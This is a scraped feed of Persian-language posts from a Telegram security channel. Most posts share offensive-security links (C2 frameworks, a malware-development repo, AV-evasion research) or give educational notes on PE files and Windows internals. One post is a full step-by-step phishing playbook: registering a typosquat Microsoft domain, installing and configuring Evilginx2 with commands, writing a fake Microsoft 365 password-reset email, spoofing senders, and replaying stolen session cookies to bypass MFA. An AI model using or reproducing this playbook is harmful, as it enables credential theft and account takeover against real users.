collection of custom-designed HTML user interfaces for Command & Control (C2) systems
https://github.com/jxroot/RedVision
⚜️ @Expire_Security ⚜️
https://github.com/jxroot/RedVision
⚜️ @Expire_Security ⚜️
GitHub
GitHub - jxroot/RedVision: collection of custom-designed HTML user interfaces for Command & Control (C2) systems.
collection of custom-designed HTML user interfaces for Command & Control (C2) systems. - jxroot/RedVision
Hacking Swagger-UI - from XSS to account takeovers
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
⚜️ @Expire_Security ⚜️
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
⚜️ @Expire_Security ⚜️
Vidoc Security Lab
Hacking Swagger-UI - from XSS to account takeovers
We have reported more than 60 instances of this bug across a wide range of bug bounty programs including companies like Paypal, Atlassian, Microsoft, GitLab, Yahoo, ...
PE(Portable Executable)
ساختار فایل PE که فایلهای اجرایی ویندوز مثل exe و dll ازش استفاده میکنن مثل یه کیک چندلایهست که هر لایه یه سری اطلاعات خاص برای سیستمعامله
1. IMAGE_DOS_HEADER
اولین بخش فایل
با دو حرف MZ شروع میشه
یه فیلد مهم به اسم e_lfanew داره که میگه از کجا باید دنبال اطلاعات جدیدتر گشت
2. PE Signature
نشون میده فایل واقعا یه فایل PE هست
چهار بایت خاصه PE و دو تا صفر تهش
ویندوز با این میفهمه فایل معتبره
3. IMAGE_FILE_HEADER
یه سری مشخصات کلی فایل
سیستم هدف سی و دو بیتی یا شصت و چهار بیتی
چند تا سکشن داره
کی ساخته شده
4. IMAGE_OPTIONAL_HEADER
با اینکه اسمش optional یا اختیاریه ولی اجباریه
نقطه شروع برنامه رو مشخص میکنه
کجا تو حافظه لود بشه
اطلاعات استک و هیپ
و یه سری جدول مهم مثل Import و Resource
5. IMAGE_SECTION_HEADER
برای هر سکشن مثل text و data و rdata
اسم سکشن
آدرس شروع تو فایل و حافظه
اندازه
مجوزهای دسترسی مثل خوندن نوشتن اجرا
6. بخشهای خاص یا Data Directories
Import Table فایلهایی که برنامه نیاز داره مثل DLL
Export Table توابعی که میشه از بیرون صدا زد
Relocation Table اگه آدرسها نیاز به جابجایی داشته باشه
نمودار ساده ساختار
MZ Header
PE Signature
File Header
Optional Header
DataDirectories
Section Headers
Raw Section Data
⚜️ @Expire_Security ⚜️
ساختار فایل PE که فایلهای اجرایی ویندوز مثل exe و dll ازش استفاده میکنن مثل یه کیک چندلایهست که هر لایه یه سری اطلاعات خاص برای سیستمعامله
1. IMAGE_DOS_HEADER
اولین بخش فایل
با دو حرف MZ شروع میشه
یه فیلد مهم به اسم e_lfanew داره که میگه از کجا باید دنبال اطلاعات جدیدتر گشت
2. PE Signature
نشون میده فایل واقعا یه فایل PE هست
چهار بایت خاصه PE و دو تا صفر تهش
ویندوز با این میفهمه فایل معتبره
3. IMAGE_FILE_HEADER
یه سری مشخصات کلی فایل
سیستم هدف سی و دو بیتی یا شصت و چهار بیتی
چند تا سکشن داره
کی ساخته شده
4. IMAGE_OPTIONAL_HEADER
با اینکه اسمش optional یا اختیاریه ولی اجباریه
نقطه شروع برنامه رو مشخص میکنه
کجا تو حافظه لود بشه
اطلاعات استک و هیپ
و یه سری جدول مهم مثل Import و Resource
5. IMAGE_SECTION_HEADER
برای هر سکشن مثل text و data و rdata
اسم سکشن
آدرس شروع تو فایل و حافظه
اندازه
مجوزهای دسترسی مثل خوندن نوشتن اجرا
6. بخشهای خاص یا Data Directories
Import Table فایلهایی که برنامه نیاز داره مثل DLL
Export Table توابعی که میشه از بیرون صدا زد
Relocation Table اگه آدرسها نیاز به جابجایی داشته باشه
نمودار ساده ساختار
MZ Header
PE Signature
File Header
Optional Header
DataDirectories
Section Headers
Raw Section Data
⚜️ @Expire_Security ⚜️
👍2🤡2
Red Teaming With Havoc C2
https://yl-labs.github.io/posts/red-reaming-havoc-c2/
⚜️ @Expire_Security ⚜️
https://yl-labs.github.io/posts/red-reaming-havoc-c2/
⚜️ @Expire_Security ⚜️
🤡1
تحلیل جاوااسکریپت برای تست نفوذگران (JavaScript Analysis for Pentesters)
در دنیای مدرن وب، جاوااسکریپت فقط یه زبان برای افکتهای ظاهری نیست؛ بلکه مرکز منطق اپلیکیشنهای سمت کاربر شده. حالا که فریمورکهایی مثل React، Vue و Angular حجم زیادی از منطق کسبوکار رو به کلاینت منتقل کردن، دیگه بدون بررسی دقیق جاوااسکریپت نمیتونیم تست نفوذ درستوحسابی انجام بدیم.
یه مقاله فوقالعاده از Konstantin توی سایت kpwn.de منتشر شده که حاصل ۵ سال تجربهش تو زمینه تست نفوذه. از شناسایی کلیدهای مخفی و endpointها گرفته تا بررسی توابع خطرناک، بایپس کردن Obfuscation، تشخیص فشردهسازی کد و کلی تکنیک جذاب دیگه، همهچی رو تو این مقاله پیدا میکنید.
اگه باگهانتر یا Pentester هستید، این مقاله میتونه تبدیل به یکی از منابع
مرجعتون بشه
https://kpwn.de/2023/05/javascript-analysis-for-pentesters/
⚜️ @Expire_Security ⚜️
در دنیای مدرن وب، جاوااسکریپت فقط یه زبان برای افکتهای ظاهری نیست؛ بلکه مرکز منطق اپلیکیشنهای سمت کاربر شده. حالا که فریمورکهایی مثل React، Vue و Angular حجم زیادی از منطق کسبوکار رو به کلاینت منتقل کردن، دیگه بدون بررسی دقیق جاوااسکریپت نمیتونیم تست نفوذ درستوحسابی انجام بدیم.
یه مقاله فوقالعاده از Konstantin توی سایت kpwn.de منتشر شده که حاصل ۵ سال تجربهش تو زمینه تست نفوذه. از شناسایی کلیدهای مخفی و endpointها گرفته تا بررسی توابع خطرناک، بایپس کردن Obfuscation، تشخیص فشردهسازی کد و کلی تکنیک جذاب دیگه، همهچی رو تو این مقاله پیدا میکنید.
اگه باگهانتر یا Pentester هستید، این مقاله میتونه تبدیل به یکی از منابع
مرجعتون بشه
https://kpwn.de/2023/05/javascript-analysis-for-pentesters/
⚜️ @Expire_Security ⚜️
kpwn.de
~/kpwn$ _
Red Team Certifications : Notes
https://an0nud4y.notion.site/Red-Team-Certifications-Notes-b68d0365b0e6431e8c35891f58f0c23a
⚜️ @Expire_Security ⚜️
https://an0nud4y.notion.site/Red-Team-Certifications-Notes-b68d0365b0e6431e8c35891f58f0c23a
⚜️ @Expire_Security ⚜️
windows internals
ویندوز اینترنالز یعنی چی اصلا
یعنی اون چیزایی که زیر پوسته سیستم عامل ویندوز هستن اون چیزایی که کاربرا نمیبینن ولی باعث میشن همه چی کار کنه
اگه بخوای یه برنامه بنویسی که عمیق با سیستم کار کنه یا بخوای بفهمی چی باعث میشه ویندوز درست کار نکنه یا بخوای دیباگ کنی یا حتی اکسپلویت بنویسی باید ویندوز اینترنالز رو بلد باشی
اینترنالز یعنی درون
یعنی بریم ببینیم ویندوز واقعا چطوری ساخته شده از چی تشکیل شده و چجوری با سخت افزار حرف میزنه چجوری برنامه ها رو اجرا میکنه چجوری حافظه رو مدیریت میکنه چجوری امنیت رو کنترل میکنه و کلی چیز دیگه
اصلا چرا باید بدونی اینا رو
اگه فقط برنامه معمولی مینویسی شاید مهم نباشه ولی اگه میخوای بفهمی وقتی یه برنامه کرش میکنه مشکلش از کجاست یا میخوای یه ابزار حرفهای بسازی یا بخوای بفهمی یه ویروس چیکار کرده باید بفهمی زیر کاپوت ویندوز چی داره میگذره
ویندوز یه سیستم عامله که از لایههای مختلف تشکیل شده یه لایه برای رابط کاربری یه لایه برای مدیریت فایلها یه لایه برای حافظه یه لایه برای امنیت و پایینترین لایه هم هسته سیستم یا کرنله
کرنل مغز سیستم عامله هر کاری که سخت و پیچیده باشه میندازه گردن کرنل مثلا وقتی یه برنامه میخواد از حافظه استفاده کنه یا میخواد یه فایل باز کنه یا یه ترد بسازه همه اینا رو از طریق یه سری API به کرنل میگه و کرنل انجامش میده
تو این سری مقالات قراره این لایهها و اجزا رو یکی یکی باز کنیم ببینیم هر کدوم چیکار میکنن و چجوری کار میکنن
مثلا وقتی یه برنامه رو باز میکنی دقیقا چه اتفاقی میفته
وقتی یه فایل رو مینویسی کجا میره
وقتی سیستم هنگ میکنه دلیلش چی میتونه باشه
وقتی یه درایور نصب میشه چطوری با سیستم یکی میشه
#windows_internals
#part_0
⚜️ @Expire_Security ⚜️
ویندوز اینترنالز یعنی چی اصلا
یعنی اون چیزایی که زیر پوسته سیستم عامل ویندوز هستن اون چیزایی که کاربرا نمیبینن ولی باعث میشن همه چی کار کنه
اگه بخوای یه برنامه بنویسی که عمیق با سیستم کار کنه یا بخوای بفهمی چی باعث میشه ویندوز درست کار نکنه یا بخوای دیباگ کنی یا حتی اکسپلویت بنویسی باید ویندوز اینترنالز رو بلد باشی
اینترنالز یعنی درون
یعنی بریم ببینیم ویندوز واقعا چطوری ساخته شده از چی تشکیل شده و چجوری با سخت افزار حرف میزنه چجوری برنامه ها رو اجرا میکنه چجوری حافظه رو مدیریت میکنه چجوری امنیت رو کنترل میکنه و کلی چیز دیگه
اصلا چرا باید بدونی اینا رو
اگه فقط برنامه معمولی مینویسی شاید مهم نباشه ولی اگه میخوای بفهمی وقتی یه برنامه کرش میکنه مشکلش از کجاست یا میخوای یه ابزار حرفهای بسازی یا بخوای بفهمی یه ویروس چیکار کرده باید بفهمی زیر کاپوت ویندوز چی داره میگذره
ویندوز یه سیستم عامله که از لایههای مختلف تشکیل شده یه لایه برای رابط کاربری یه لایه برای مدیریت فایلها یه لایه برای حافظه یه لایه برای امنیت و پایینترین لایه هم هسته سیستم یا کرنله
کرنل مغز سیستم عامله هر کاری که سخت و پیچیده باشه میندازه گردن کرنل مثلا وقتی یه برنامه میخواد از حافظه استفاده کنه یا میخواد یه فایل باز کنه یا یه ترد بسازه همه اینا رو از طریق یه سری API به کرنل میگه و کرنل انجامش میده
تو این سری مقالات قراره این لایهها و اجزا رو یکی یکی باز کنیم ببینیم هر کدوم چیکار میکنن و چجوری کار میکنن
مثلا وقتی یه برنامه رو باز میکنی دقیقا چه اتفاقی میفته
وقتی یه فایل رو مینویسی کجا میره
وقتی سیستم هنگ میکنه دلیلش چی میتونه باشه
وقتی یه درایور نصب میشه چطوری با سیستم یکی میشه
#windows_internals
#part_0
⚜️ @Expire_Security ⚜️
👍1
ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ
windows internals ویندوز اینترنالز یعنی چی اصلا یعنی اون چیزایی که زیر پوسته سیستم عامل ویندوز هستن اون چیزایی که کاربرا نمیبینن ولی باعث میشن همه چی کار کنه اگه بخوای یه برنامه بنویسی که عمیق با سیستم کار کنه یا بخوای بفهمی چی باعث میشه ویندوز درست کار نکنه…
اول از همه باید بدونی که ویندوز مثل یه ساختمونه که از چند طبقه تشکیل شده هر طبقه وظیفه خاصی داره بعضی طبقهها مخصوص کاربرا هستن بعضیها مخصوص خود سیستم
اگه بخوای ساده بگی معماری ویندوز دو بخش اصلی داره
یکی user mode
یکی kernel mode
یعنی یه سری چیزا فقط تو حالت کاربر اجرا میشن یه سری چیزا تو حالت کرنل که دسترسی کامل به همه چی دارن
حالت کاربر همون چیزیه که ما به عنوان کاربر باهاش سروکار داریم مثلا برنامههایی مثل ورد مرورگر فایل اکسپلورر یا حتی بازیها اینا همه تو user mode اجرا میشن و نمیتونن مستقیم با سختافزار یا حافظه فیزیکی حرف بزنن
حالت کرنل اونجاست که کنترل واقعی سیستم دستشه
هر چیزی که بخواد به سختافزار دسترسی داشته باشه یا حافظه سیستم رو مدیریت کنه یا زمانبندی انجام بده باید تو kernel mode اجرا بشه
برنامههای کاربر اگه بخوان کاری کنن که نیاز به دسترسی سطح پایین داره باید درخواستش رو بدن به کرنل و کرنل تصمیم میگیره اجراش بکنه یا نه
حالا بیایم یه نقشه کلی از معماری ویندوز ترسیم کنیم
از بالا به پایین اینطوریه
۱. برنامههای کاربر (User Applications)
همه چیزایی که تو دسکتاپ میبینی یا اجرا میکنی اینجاست مثل کروم فتوشاپ cmd فایل اکسپلورر
اینا مستقیم با سختافزار کار نمیکنن بلکه از API های سیستم استفاده میکنن
۲. زیرسیستمهای محیطی (Environment Subsystems)
یه لایه واسطه هست که بین برنامههای کاربر و سیستم عامل قرار میگیره مثلا win32 subsystem که برنامههای معمولی ویندوز باهاش حرف میزنن
اگه یه برنامه مخصوص POSIX یا OS/2 باشه میره سراغ زیرسیستم مربوط به خودش (البته اینا دیگه کمکاربردن)
۳. Executive Services (کرنل سطح بالا)
اینجا جاییه که اجزای اصلی سیستم کار میکنن مثل
memory manager
process manager
I/O manager
object manager
security reference monitor
این سرویسا همه تو kernel mode اجرا میشن و کارای واقعی رو انجام میدن
۴. کرنل (Kernel)
هسته واقعی سیستم اینجاست که چیزایی مثل زمانبندی تردها interrupt handling و synchronization رو انجام میده
یعنی کرنل وسط این پازله همهچی از اینجا کنترل میشه
۵. HAL (Hardware Abstraction Layer)
یه لایه هست بین کرنل و سختافزار
کارش اینه که اجازه بده ویندوز رو رو سختافزارهای مختلف اجرا کنی بدون اینکه لازم باشه برنامهها بدونن چی دقیقا پشت صحنه هست
مثلا چه مدل CPU چه مدل مادربرد چه چیپست
HAL مثل یه مترجم بین کرنل و سختافزاره
۶. درایورها (Drivers)
اینا یه جور نرمافزار هستن که به سختافزار میگن چیکار کن
مثلا درایور کارت گرافیک درایور موس درایور شبکه
درایورها هم تو حالت کرنل اجرا میشن چون باید بتونن با سختافزار مستقیما در ارتباط باشن
پس اگه بخوای خلاصه کنی ویندوز از بالا تا پایین اینطوریه
برنامه کاربر ← زیرسیستم ← Executive ← کرنل ← HAL ← سختافزار
هر وقت یه برنامه اجرا میشه یا یه فایل باز میکنی یا یه کاربر لاگین میکنه این مسیر از بالا تا پایین و برعکس طی میشه
همه چی مثل یه سیستم چند طبقه کار میکنه
#windows_internals
#part_1
⚜️ @Expire_Security ⚜️
اگه بخوای ساده بگی معماری ویندوز دو بخش اصلی داره
یکی user mode
یکی kernel mode
یعنی یه سری چیزا فقط تو حالت کاربر اجرا میشن یه سری چیزا تو حالت کرنل که دسترسی کامل به همه چی دارن
حالت کاربر همون چیزیه که ما به عنوان کاربر باهاش سروکار داریم مثلا برنامههایی مثل ورد مرورگر فایل اکسپلورر یا حتی بازیها اینا همه تو user mode اجرا میشن و نمیتونن مستقیم با سختافزار یا حافظه فیزیکی حرف بزنن
حالت کرنل اونجاست که کنترل واقعی سیستم دستشه
هر چیزی که بخواد به سختافزار دسترسی داشته باشه یا حافظه سیستم رو مدیریت کنه یا زمانبندی انجام بده باید تو kernel mode اجرا بشه
برنامههای کاربر اگه بخوان کاری کنن که نیاز به دسترسی سطح پایین داره باید درخواستش رو بدن به کرنل و کرنل تصمیم میگیره اجراش بکنه یا نه
حالا بیایم یه نقشه کلی از معماری ویندوز ترسیم کنیم
از بالا به پایین اینطوریه
۱. برنامههای کاربر (User Applications)
همه چیزایی که تو دسکتاپ میبینی یا اجرا میکنی اینجاست مثل کروم فتوشاپ cmd فایل اکسپلورر
اینا مستقیم با سختافزار کار نمیکنن بلکه از API های سیستم استفاده میکنن
۲. زیرسیستمهای محیطی (Environment Subsystems)
یه لایه واسطه هست که بین برنامههای کاربر و سیستم عامل قرار میگیره مثلا win32 subsystem که برنامههای معمولی ویندوز باهاش حرف میزنن
اگه یه برنامه مخصوص POSIX یا OS/2 باشه میره سراغ زیرسیستم مربوط به خودش (البته اینا دیگه کمکاربردن)
۳. Executive Services (کرنل سطح بالا)
اینجا جاییه که اجزای اصلی سیستم کار میکنن مثل
memory manager
process manager
I/O manager
object manager
security reference monitor
این سرویسا همه تو kernel mode اجرا میشن و کارای واقعی رو انجام میدن
۴. کرنل (Kernel)
هسته واقعی سیستم اینجاست که چیزایی مثل زمانبندی تردها interrupt handling و synchronization رو انجام میده
یعنی کرنل وسط این پازله همهچی از اینجا کنترل میشه
۵. HAL (Hardware Abstraction Layer)
یه لایه هست بین کرنل و سختافزار
کارش اینه که اجازه بده ویندوز رو رو سختافزارهای مختلف اجرا کنی بدون اینکه لازم باشه برنامهها بدونن چی دقیقا پشت صحنه هست
مثلا چه مدل CPU چه مدل مادربرد چه چیپست
HAL مثل یه مترجم بین کرنل و سختافزاره
۶. درایورها (Drivers)
اینا یه جور نرمافزار هستن که به سختافزار میگن چیکار کن
مثلا درایور کارت گرافیک درایور موس درایور شبکه
درایورها هم تو حالت کرنل اجرا میشن چون باید بتونن با سختافزار مستقیما در ارتباط باشن
پس اگه بخوای خلاصه کنی ویندوز از بالا تا پایین اینطوریه
برنامه کاربر ← زیرسیستم ← Executive ← کرنل ← HAL ← سختافزار
هر وقت یه برنامه اجرا میشه یا یه فایل باز میکنی یا یه کاربر لاگین میکنه این مسیر از بالا تا پایین و برعکس طی میشه
همه چی مثل یه سیستم چند طبقه کار میکنه
#windows_internals
#part_1
⚜️ @Expire_Security ⚜️
👍2
Rust for Malware Development
This repository contains source codes of various techniques used by real-world malware authors, red teamers, threat actors, state-sponsored hacking groups etc. These techniques are well-researched and implemented in Rust
https://github.com/Whitecat18/Rust-for-Malware-Development
⚜️ @Expire_Security ⚜️
This repository contains source codes of various techniques used by real-world malware authors, red teamers, threat actors, state-sponsored hacking groups etc. These techniques are well-researched and implemented in Rust
https://github.com/Whitecat18/Rust-for-Malware-Development
⚜️ @Expire_Security ⚜️
GitHub
GitHub - Whitecat18/Rust-for-Malware-Development: Rust for malware Development is a repository for advanced Red Team techniques…
Rust for malware Development is a repository for advanced Red Team techniques and offensive malwares & Ransomwares, focused on Rust 🦀 - Whitecat18/Rust-for-Malware-Development
Open-Source Evaluation & Testing for AI & LLM systems
https://github.com/Giskard-AI/giskard
⚜️ @Expire_Security ⚜️
https://github.com/Giskard-AI/giskard
⚜️ @Expire_Security ⚜️
GitHub
GitHub - Giskard-AI/giskard-oss: 🐢 Open-Source Evaluation & Testing library for LLM Agents
🐢 Open-Source Evaluation & Testing library for LLM Agents - Giskard-AI/giskard-oss
ابزار mcp-scan یک ابزار امنیتی متنباز برای اسکن و تحلیل سرورهای MCP (Modular Compute Platform) است که توسط invariantlabs-ai توسعه داده شده
این ابزار بهطور خاص طراحی شده برای شناسایی آسیبپذیریها و پیکربندیهای نادرست در محیطهای MCP
https://github.com/invariantlabs-ai/mcp-scan
⚜️ @Expire_Security ⚜️
این ابزار بهطور خاص طراحی شده برای شناسایی آسیبپذیریها و پیکربندیهای نادرست در محیطهای MCP
https://github.com/invariantlabs-ai/mcp-scan
⚜️ @Expire_Security ⚜️
GitHub
GitHub - snyk/agent-scan: Security scanner for AI agents, MCP servers and agent skills.
Security scanner for AI agents, MCP servers and agent skills. - snyk/agent-scan
یک رول Ansible که وظیفه اش نصب و راهاندازی Adaptix C2 (هم سرور و هم کلاینت) روی سیستم های مبتنی بر Debian/Ubuntu هست
https://github.com/badsectorlabs/ludus_adaptix_c2
⚜️ @Expire_Security ⚜️
https://github.com/badsectorlabs/ludus_adaptix_c2
⚜️ @Expire_Security ⚜️
GitHub
GitHub - badsectorlabs/ludus_adaptix_c2: An Ansible role that install the Adaptix C2 server and/or client on Debian based hosts
An Ansible role that install the Adaptix C2 server and/or client on Debian based hosts - badsectorlabs/ludus_adaptix_c2
👍2
دور زدن آنتیویروس با مبهمسازی خط فرمان
command line obfuscation
یک تکنیک حرفه ای برای فرار از شناسایی سیستمهای امنیتی
یه پژوهشگر امنیت سایبری به نام Wietze Beukema نشون داده که چطور میشه با ترفندهایی ساده ولی خلاقانه دستورات خط فرمان ویندوز رو طوری نوشت که کار همیشگی رو انجام بدن ولی توسط ابزارهای امنیتی مثل انتی ویروس ها و EDR شناسایی نشن
چطوری ممکنه؟
بعضی از برنامههای سیستمی ویندوز به دلیل طراحی خاص یا قدیمی بودن پارامترهای دستوری رو به شکلهای مختلف می پذیرن مثلاً:
استفاده از / بهجای -
وارد کردن کاراکترها با فرمت یونیکد (مثل U+2044 بهجای /)
یا ترکیبهای نا اشنا که همچنان معتبر هستن
ابزار ArgFuscator:
Beukema
برای راحتتر شدن کار یه ابزار ساخته به اسم ArgFuscator که میتونه این دستورات مبهم شده رو تولید کنه این ابزار برای تست سیستمهای دفاعی خیلی مفیده
لینک مقاله + ابزار:
https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation
⚜️ @Expire_Security ⚜️
command line obfuscation
یک تکنیک حرفه ای برای فرار از شناسایی سیستمهای امنیتی
یه پژوهشگر امنیت سایبری به نام Wietze Beukema نشون داده که چطور میشه با ترفندهایی ساده ولی خلاقانه دستورات خط فرمان ویندوز رو طوری نوشت که کار همیشگی رو انجام بدن ولی توسط ابزارهای امنیتی مثل انتی ویروس ها و EDR شناسایی نشن
چطوری ممکنه؟
بعضی از برنامههای سیستمی ویندوز به دلیل طراحی خاص یا قدیمی بودن پارامترهای دستوری رو به شکلهای مختلف می پذیرن مثلاً:
استفاده از / بهجای -
وارد کردن کاراکترها با فرمت یونیکد (مثل U+2044 بهجای /)
یا ترکیبهای نا اشنا که همچنان معتبر هستن
ابزار ArgFuscator:
Beukema
برای راحتتر شدن کار یه ابزار ساخته به اسم ArgFuscator که میتونه این دستورات مبهم شده رو تولید کنه این ابزار برای تست سیستمهای دفاعی خیلی مفیده
لینک مقاله + ابزار:
https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation
⚜️ @Expire_Security ⚜️
www.wietzebeukema.nl
Bypassing Detections with Command-Line Obfuscation
Defensive tools like AVs and EDRs rely on command-line arguments for detecting malicious activity. This post demonstrates how command-line obfuscation, a shell-independent technique that exploits executables’ parsing “flaws”, can bypass such detections. It…
❤1👍1
TitanHide
چیه؟
یه درایوره که کمک میکنه دیباگر (Debugger) رو از دید بعضی برنامهها مخفی کنی
با یه ترفندهایی توی کرنل ویندوز (مثل هوک کردن توابع سیستمی) کاری میکنه برنامه نفهمه داره دیباگ میشه
فقط کافیه id پردازش و گزینههایی که میخوای مخفی بشن رو بهش بدی خودش بقیه کارها رو میکنه
https://github.com/mrexodia/TitanHide
⚜️ @Expire_Security ⚜️
چیه؟
یه درایوره که کمک میکنه دیباگر (Debugger) رو از دید بعضی برنامهها مخفی کنی
با یه ترفندهایی توی کرنل ویندوز (مثل هوک کردن توابع سیستمی) کاری میکنه برنامه نفهمه داره دیباگ میشه
فقط کافیه id پردازش و گزینههایی که میخوای مخفی بشن رو بهش بدی خودش بقیه کارها رو میکنه
https://github.com/mrexodia/TitanHide
⚜️ @Expire_Security ⚜️
GitHub
GitHub - mrexodia/TitanHide: Hiding kernel-driver for x86/x64.
Hiding kernel-driver for x86/x64. Contribute to mrexodia/TitanHide development by creating an account on GitHub.
🔥1
مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت
کاری که میکنیم
یه دامنه تقلبی ثبت میکنیم مثلا
m1crosoft-support.com
به جای حرف i از عدد 1 استفاده کردیم
این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته
دامنه رو از یه جایی میخریم که گواهی امنیتی رایگان HTTPS میده مثل
Namecheap
Porkbun
تنظیم میکنیم که این دامنه به سرور ما VPS وصل بشه
مرحله ۲ راهاندازی ابزار Evilginx2 روی سرور
Evilginx2 یه ابزار فیشینگ حرفهایه که کمک میکنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم
ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه
نصب ابزارها با دستور
sudo apt update && sudo apt install git make gcc certbot -y
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx
تنظیمات اولیه برای دامنه
config domain m1crosoft-support.com
config ip آی پی سرور شما
config redirect_url https://login.microsoftonline.com
config site microsoft
enable microsoft
گرفتن گواهی امنیتی HTTPS رایگان
sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns
و بعد فایلهای امنیتی رو به Evilginx2 معرفی میکنیم
config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem
config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem
مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف
هدف اینه که کاربر روی لینک جعلی کلیک کنه
نمونه متن ایمیل میتونه به این صورت باشه
موضوع : مهم تغییر اجباری رمز حساب Microsoft 365
کاربر گرامی
برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید
https://m1crosoft-support com/auth
ترفندهایی که میتونیم بزنیم:
جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه
استفاده از لینکهای کوتاه یا QR Code برای پنهان کردن لینک جعلی
ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک
مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر
وقتی کاربر روی لینک کلیک میکنه
سایت جعلی ما باز میشه
Evilginx2 اطلاعات ورود کاربر رو میگیره ولی همزمان کاربر واقعا وارد Microsoft میشه
در پشت صحنه ما توکنهای ورود Session Token رو از مرورگر کاربر میگیریم
مثلا چیزی شبیه این توی لاگها ظاهر میشه
Captured new credentials
Username user@company.com
Session Tokens {...}
مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA
الان که توکنها رو داریم نیازی به رمز عبور یا تایید MFA نیست
برای استفاده از توکن
مرورگر مثلا Chrome رو باز کن
یه تب مخفی incognito باز کن
برو به DevTools F12 تب Application بخش Cookies
مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکیها اضافه کن
صفحه Microsoft 365 رو ریفرش کن
ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه
#red_team
#phising
#Evilginx2
⚜️ @Expire_Security ⚜️
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session…
Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication - kgretzky/evilginx2
❤3
ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ
مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت
برای این هم میتونیم از ابزار هایی که وظیفشون تولید همچین دامین هایی هست استفاده کنیم که نمونش
ابزار
dnstwist
هست
https://github.com/elceef/dnstwist
که میتونه دامنه هایی که قبلا تولید شده رو هم نشون بده
⚜️ @Expire_Security ⚜️
ابزار
dnstwist
هست
https://github.com/elceef/dnstwist
که میتونه دامنه هایی که قبلا تولید شده رو هم نشون بده
⚜️ @Expire_Security ⚜️
GitHub
GitHub - elceef/dnstwist: Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation - elceef/dnstwist
❤3
QLPro.pdf
1.8 MB
QLPro: Automated Code Vulnerability Discovery via LLM and Static
Code Analysis Integration
⚜️ @Expire_Security ⚜️
Code Analysis Integration
⚜️ @Expire_Security ⚜️